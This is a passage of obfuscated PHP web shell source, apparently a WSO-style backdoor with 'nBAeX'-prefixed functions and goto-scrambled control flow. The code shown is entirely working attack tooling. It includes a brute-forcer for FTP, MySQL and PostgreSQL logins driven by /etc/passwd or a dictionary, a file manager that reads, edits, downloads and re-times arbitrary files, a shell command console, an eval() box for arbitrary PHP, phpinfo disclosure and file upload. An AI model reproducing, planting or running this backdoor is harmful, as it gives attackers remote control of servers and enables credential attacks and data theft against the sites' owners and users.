(@$_POST['reverse']) { goto Dc61b; aa740: $i = strlen($line[0]) - 1; goto D20b8; D1213: --$i; goto Ff499; cc407: ++$attempts; goto Bc516; c248b: fab77: goto cc407; Dc61b: $tmp = ""; goto aa740; db897: Cae9f: goto D1213; D20b8: dd2dc: goto bac10; bac10: if (!($i >= 0)) { goto fab77; } goto cc593; cc593: $tmp .= $line[0][$i]; goto db897; Bc516: if (nBAeXBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp); } goto A4d7e; Ff499: goto dd2dc; goto c248b; A4d7e: } goto Fa2dd; f4338: if (nBAeXBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>'; } goto C9b6b; b4e39: $line = explode(":", $line); goto B6dcf; B6dcf: ++$attempts; goto f4338; b541c: } Af89a: } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) { goto f8cc3; f8cc3: $line = trim($line); goto D9f8c; f586d: B096e: goto Fed46; D9f8c: ++$attempts; goto C3256; C3256: if (nBAeXBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto f586d; Fed46: } Ef087: } } goto d3788; d3788: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto A8287; Bad35: $attempts = 0; goto C6dca; e72b0: if ($_POST['proto'] == 'ftp') { function nBAeXBruteForce($ip, $port, $login, $pass) { goto a5917; e5b97: @ftp_close($fp); goto d153c; Fb66c: if (!$fp) { return false; } goto Cd314; Cd314: $res = @ftp_login($fp, $login, $pass); goto e5b97; d153c: return $res; goto cbaec; a5917: $fp = @ftp_connect($ip, $port ? $port : 21); goto Fb66c; cbaec: } } elseif ($_POST['proto'] == 'mysql') { function nBAeXBruteForce($ip, $port, $login, $pass) { goto A017e; dbf4b: @mysql_close($res); goto f34c4; f34c4: return $res; goto bb4a6; A017e: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto dbf4b; bb4a6: } } elseif ($_POST['proto'] == 'pgsql') { function nBAeXBruteForce($ip, $port, $login, $pass) { goto Cc5e6; A5e93: $res = @pg_connect($str); goto Ac7e2; Ac7e2: @pg_close($res); goto c9f04; c9f04: return $res; goto Ea8a8; Cc5e6: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto A5e93; Ea8a8: } } goto d9684; Ec15f: echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>'; goto e72b0; C6dca: $server = explode(":", $_POST['server']); goto f34b8; A8287: } goto b9e43; Fd5e1: echo '</div><br>'; goto A98d2; b9e43: echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; goto Fd5e1; ed89b: } goto Febf6; fcada: function actionFilesTools() { goto e98cf; c4e03: nBAeXHeader(); goto Ea789; abe77: Dd561: goto a7264; f3084: nBAeXFooter(); goto Bf320; D00c7: switch ($_POST['p2']) { case 'view': goto B5ac6; A4a13: $fp = @fopen($_POST['p1'], 'r'); goto a3be3; d51cc: echo '</pre>'; goto adcfe; B5ac6: echo '<pre class=ml1>'; goto A4a13; adcfe: goto B7eb7; goto eb7c7; a3be3: if ($fp) { goto fe256; D9bca: A4f88: goto F386e; f59ff: goto D6d9a; goto D9bca; c6692: if (@feof($fp)) { goto A4f88; } goto Ae034; F386e: @fclose($fp); goto c4732; Ae034: echo htmlspecialchars(@fread($fp, 1024)); goto f59ff; fe256: D6d9a: goto c6692; c4732: } goto d51cc; eb7c7: case 'highlight': if (@is_readable($_POST['p1'])) { goto a03c4; a03c4: echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; goto c80b9; Beec7: echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>'; goto d47e7; c80b9: $code = @highlight_file($_POST['p1'], true); goto Beec7; d47e7: } goto B7eb7; case 'chmod': goto D7732; b4e29: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>'; goto C0594; C0594: goto B7eb7; goto B228b; D7732: if (!empty($_POST['p3'])) { goto af504; bced7: $i = strlen($_POST['p3']) - 1; goto f3760; e49a5: if (!($i >= 0)) { goto ac0d2; } goto a66ff; A6eb1: a2d98: goto Da20b; a66ff: $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto A6eb1; b1f62: ac0d2: goto fae10; fae10: if (!@chmod($_POST['p1'], $perms)) { echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } goto B8913; bd328: goto E2b65; goto b1f62; f3760: E2b65: goto e49a5; af504: $perms = 0; goto bced7; Da20b: --$i; goto bd328; B8913: } goto B3161; B3161: clearstatcache(); goto b4e29; B228b: case 'edit': goto eab4d; A0c19: if (!empty($_POST['p3'])) { goto b7696; bd693: $_POST['p3'] = substr($_POST['p3'], 1); goto F19d0; b7696: $time = @filemtime($_POST['p1']); goto bd693; F19d0: $fp = @fopen($_POST['p1'], "w"); goto Ad8a7; Ad8a7: if ($fp) { goto C1a85; ac390: @fclose($fp); goto A5908; C1a85: @fwrite($fp, $_POST['p3']); goto ac390; c4bce: @touch($_POST['p1'], $time, $time); goto a85a1; A5908: echo 'Saved!<br><script>p3_="";</script>'; goto c4bce; a85a1: } goto f37aa; f37aa: } goto ff6ef; eab4d: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto B7eb7; } goto A0c19; c0ea3: $fp = @fopen($_POST['p1'], 'r'); goto Ad80b; ff6ef: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; goto c0ea3; f9056: echo '</textarea><input type=submit value=">>"></form>'; goto F0f5a; Ad80b: if ($fp) { goto a7c5a; E2cfb: a0c74: goto Ec3b1; Ec3b1: @fclose($fp); goto b4905; a5ead: goto A73d1; goto E2cfb; F18cf: if (@feof($fp)) { goto a0c74; } goto E2685; E2685: echo htmlspecialchars(@fread($fp, 1024)); goto a5ead; a7c5a: A73d1: goto F18cf; b4905: } goto f9056; F0f5a: goto B7eb7; goto C1928; C1928: case 'hexdump': goto cc491; bc5fc: f4f44: goto Ce998; ced99: $h = array('00000000<br>', '', ''); goto B41f8; B41f8: $len = strlen($c); goto e5000; cc63f: ++$i; goto c5825; edc1c: b3668: goto bc5fc; Cf609: E01e7: goto Eb677; D8860: goto B7eb7; goto A2e98; c3fcd: $h[1] .= sprintf('%02X', ord($c[$i])) . ' '; goto a159f; ac0e2: $n = 0; goto ced99; a8c6c: if (!($i < $len)) { goto E01e7; } goto c3fcd; Eb677: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>'; goto D8860; adf53: if ($n == 32) { goto b1f40; b6175: if ($i + 1 < $len) { $h[0] .= sprintf('%08X', $i + 1) . '<br>'; } goto A31f0; b1f40: $n = 0; goto b6175; A31f0: $h[1] .= '<br>'; goto cd18f; cd18f: $h[2] .= "\n"; goto cb041; cb041: } goto A343a; A343a: Af7a5: goto cc63f; a159f: switch (ord($c[$i])) { case 0: $h[2] .= ' '; goto f4f44; case 9: $h[2] .= ' '; goto f4f44; case 10: $h[2] .= ' '; goto f4f44; case 13: $h[2] .= ' '; goto f4f44; default: $h[2] .= $c[$i]; goto f4f44; } goto edc1c; c5825: goto adf8d; goto Cf609; Ce998: $n++; goto adf53; db1f6: adf8d: goto a8c6c; e5000: $i = 0; goto db1f6; cc491: $c = @file_get_contents($_POST['p1']); goto ac0e2; A2e98: case 'rename': goto Fd932; Ab42f: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>'; goto ef4db; Fd932: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'], $_POST['p3'])) { echo 'Can\'t rename!<br>'; } else { die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>'); } } goto Ab42f; ef4db: goto B7eb7; goto cbee3; cbee3: case 'touch': goto a27e7; e4d63: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>'; goto b75b4; ea2d8: clearstatcache(); goto e4d63; a27e7: if (!empty($_POST['p3'])) { $time = strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!'; } else { echo 'Touched!'; } } else { echo 'Bad time format!'; } } goto ea2d8; b75b4: goto B7eb7; goto c0084; c0084: } goto Ab165; A8a38: if (!file_exists(@$_POST['p1'])) { goto e7060; A4396: nBAeXFooter(); goto F4a2a; F4a2a: return; goto F2de1; e7060: echo 'File not exists'; goto A4396; F2de1: } goto a6058; dfd27: if (empty($_POST['p2'])) { $_POST['p2'] = 'view'; } goto A2d5c; f81c4: if (@$_POST['p2'] == 'mkfile') { if (!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } goto c4e03; a6058: $uid = @posix_getpwuid(@fileowner($_POST['p1'])); goto f1150; A2d5c: if (is_file($_POST['p1'])) { $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); } else { $m = array('Chmod', 'Rename', 'Touch'); } goto Dc37b; Dc37b: foreach ($m as $v) { echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; bcbea: } goto abe77; Ab165: B532b: goto E2dac; E2dac: B7eb7: goto Ab6ef; Ab6ef: echo '</div>'; goto f3084; e428a: echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? nBAeXViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . nBAeXPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>'; goto b3eb1; e98cf: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto a0dd4; a0dd4: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { goto D5dea; D5dea: ob_start("ob_gzhandler", 4096); goto a7c3a; A15b6: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto b7069; C551d: if ($fp) { goto c2670; c9785: F493d: goto Ce6b6; e79ff: if (@feof($fp)) { goto F493d; } goto f7b6e; c2670: C3946: goto e79ff; Ce6b6: fclose($fp); goto a1a6e; a7111: goto C3946; goto c9785; f7b6e: echo @fread($fp, 1024); goto a7111; a1a6e: } goto D9ba0; b7069: $fp = @fopen($_POST['p1'], "r"); goto C551d; a7c3a: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto A15b6; D9ba0: } exit; } goto f81c4; Ea789: echo '<h1>File tools</h1><div class=content>'; goto A8a38; a7264: echo '<br><br>'; goto D00c7; b3eb1: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>'; goto dfd27; f1150: if (!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else { $gid = @posix_getgrgid(@filegroup($_POST['p1'])); } goto e428a; Bf320: } goto c1d09; C244f: function nBAeXFooter() { $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t<tr>\r\n\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\r\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>\r\n\t</tr></table></div></body></html>"; } goto Ee602; A2b48: $color = "#df5"; goto a02db; c1d09: function actionConsole() { goto C2ef7; cebc9: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; goto cb514; Daebb: if (isset($_POST['ajax'])) { goto B6e63; b1770: echo "d.cf.cmd.value='';\n"; goto C9d48; B234d: ob_start(); goto b1770; Aa629: echo strlen($temp), "\n", $temp; goto b1470; b1470: exit; goto ac47a; D6fa4: if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) { if (@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto f91a4; D852a: $temp = ob_get_clean(); goto Aa629; A42f8: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto D852a; B6e63: nBAeXsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto B234d; f91a4: echo "d.cf.output.value+='" . $temp . "';"; goto A42f8; C9d48: $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . nBAeXEx($_POST['p1']), "\n\r\t\\'\0")); goto D6fa4; ac47a: } goto D27e0; ef89e: e573d: goto C07c4; f4d3d: if (!empty($_POST['p1'])) { echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . nBAeXEx($_POST['p1'])); } goto Cf24b; Cf24b: echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; goto D2ac3; A3b8a: echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>"; goto cebc9; ed050: nBAeXHeader(); goto A3b8a; cb514: foreach ($GLOBALS['aliases'] as $n => $v) { goto afe88; ed2f0: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto e4468; afe88: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto F138e; } goto ed2f0; e4468: F138e: goto e41d2; e41d2: } goto ef89e; C07c4: echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; goto f4d3d; D2ac3: echo '</form></div><script>d.cf.cmd.focus();</script>'; goto A21c5; C2ef7: if (!empty($_POST['p1']) && !empty($_POST['p2'])) { nBAeXsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif (!empty($_POST['p1'])) { nBAeXsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0); } goto Daebb; A21c5: nBAeXFooter(); goto f8cb4; D27e0: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nBAeXsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto ed050; f8cb4: } goto a6181; E5418: $safe_mode = @ini_get('safe_mode'); goto a43cf; F00b4: function nBAeXScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto ed406; ed406: $dh = opendir($dir); goto Cc15e; Cc15e: E6980: goto b8110; D4968: return $files; goto Cb4f1; a3c46: goto E6980; goto a1700; a1700: acae6: goto D4968; b8110: if (!(false !== ($filename = readdir($dh)))) { goto acae6; } goto Cf0eb; Cf0eb: $files[] = $filename; goto a3c46; Cb4f1: } } goto C0920; a6181: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } goto ad91c; Deff2: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = 'win'; } else { $os = 'nix'; } goto E5418; a02db: $default_action = 'FilesMan'; goto eb0bb; B1dd4: function actionPhp() { goto B5758; b5ce3: nBAeXFooter(); goto B36a5; Aad57: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nBAeXsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto d881a; ba633: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">'; goto f6f01; c3c48: if (isset($_POST['p2']) && $_POST['p2'] == 'info') { goto d0bd8; B2d6a: $tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp); goto Cab49; Cab49: echo str_replace('<h1', '<h2', $tmp) . '</div><br>'; goto Fbd53; Ad2d3: phpinfo(); goto C0fb0; Ba16a: ob_start(); goto Ad2d3; C0fb0: $tmp = ob_get_clean(); goto B2d6a; d0bd8: echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; goto Ba16a; Fbd53: } goto ba633; d68b1: if (!empty($_POST['p1'])) { goto E5966; E5966: ob_start(); goto A76ca; A76ca: eval($_POST['p1']); goto c7b5e; c7b5e: echo htmlspecialchars(ob_get_clean()); goto B8816; B8816: } goto Dc6fd; Dc6fd: echo '</pre></div>'; goto b5ce3; d881a: nBAeXHeader(); goto c3c48; B5758: if (isset($_POST['ajax'])) { goto a4173; Ab3fb: ob_start(); goto B3cef; B3cef: eval($_POST['p1']); goto f702e; Bd64a: echo strlen($temp), "\n", $temp; goto B4f2a; a4173: nBAeXsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto Ab3fb; f702e: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto Bd64a; B4f2a: exit; goto Ad84d; Ad84d: } goto Aad57; f6f01: echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>'; goto d68b1; B36a5: } goto D368c; dff48: $default_charset = 'Windows-1251'; goto fd8a1; Ee602: if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function posix_getpwuid($p) { return false; } } goto d0451; e7b4d: function nBAeXPerms($p) { goto ba9c8; ad7ed: $i .= $p & 0x100 ? 'r' : '-'; goto E3f19; B83b9: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-'); goto edb7c; Edd63: $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto c6f0f; Fd025: $i .= $p & 0x4 ? 'r' : '-'; goto A4893; edb7c: $i .= $p & 0x20 ? 'r' : '-'; goto F905b; E3f19: $i .= $p & 0x80 ? 'w' : '-'; goto B83b9; ba9c8: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto ad7ed; F905b: $i .= $p & 0x10 ? 'w' : '-'; goto Bf5e4; c6f0f: return $i; goto a0caa; A4893: $i .= $p & 0x2 ? 'w' : '-'; goto Edd63; Bf5e4: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-'); goto Fd025; a0caa: } goto ae419; a4769: function actionStringTools() { goto a8d97; efa4e: if (isset($_POST['ajax'])) { goto b6e6b; F06c7: exit; goto D6777; B532c: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto Cf2e3; b6e6b: nBAeXsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto dd701; dd701: ob_start(); goto fe93d; fe93d: if (in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto B532c; Cf2e3: echo strlen($temp), "\n", $temp; goto F06c7; D6777: } goto bd74f; f0749: if (!function_exists('ascii2hex')) { function ascii2hex($p) { goto E9339; abb18: $r .= sprintf('%02X', ord($p[$i])); goto Ccf3f; F92fd: $i = 0; goto ecff3; Ccf3f: e7211: goto D4423; F37f6: return strtoupper($r); goto ee5b9; ee1ea: if (!($i < strlen($p))) { goto E7258; } goto abb18; ecff3: d7c37: goto ee1ea; E9339: $r = ''; goto F92fd; ef11b: goto d7c37; goto Fd00e; D4423: ++$i; goto ef11b; Fd00e: E7258: goto F37f6; ee5b9: } } goto Bfd60; fe13f: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; D6485: } goto f2713; ad1a1: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto bbfe6; c7522: nBAeXFooter(); goto e473d; a8d97: if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto ad1a1; dd943: if (@$_POST['p3']) { nBAeXRecursiveGlob($_POST['c']); } goto E7f63; bbfe6: if (!function_exists('hex2ascii')) { function hex2ascii($p) { goto F0377; F2ba7: C403d: goto Dbad6; ccf39: $r .= chr(hexdec($p[$i] . $p[$i + 1])); goto fb5b3; e959d: $i = 0; goto F2ba7; fb5b3: d4540: goto bb88f; bb88f: $i += 2; goto C429e; F0377: $r = ''; goto e959d; B667f: afe3a: goto a20e1; a20e1: return $r; goto c0a84; C429e: goto C403d; goto B667f; Dbad6: if (!($i < strLen($p))) { goto afe3a; } goto ccf39; c0a84: } } goto f0749; c5733: echo '<h1>String conversions</h1><div class=content>'; goto A18c4; Bfd60: if (!function_exists('full_urlencode')) { function full_urlencode($p) { goto Ceae7; a7ab5: return strtoupper($r); goto Af9d9; A8d13: ac2e2: goto a7ab5; E3ee1: $r .= '%' . dechex(ord($p[$i])); goto e9252; B15f7: $i = 0; goto Af630; Af630: Abbc2: goto D029a; e9252: Cf0dc: goto d60d0; ab522: goto Abbc2; goto A8d13; d60d0: ++$i; goto ab522; D029a: if (!($i < strlen($p))) { goto ac2e2; } goto E3ee1; Ceae7: $r = ''; goto B15f7; Af9d9: } } goto e9b6f; e9b6f: $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto efa4e; B945e: nBAeXHeader(); goto c5733; B7139: function nBAeXRecursiveGlob($path) { goto E2048; C0c35: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { nBAeXRecursiveGlob($item); } } else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>"; } } ef849: } e4c18: } goto F6f4c; E2048: if (substr($path, -1) != '/') { $path .= '/'; } goto B241d; B241d: $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto C0c35; F6f4c: } goto dd943; bd74f: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nBAeXsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto B945e; A18c4: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto fe13f; C3956: echo "</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' 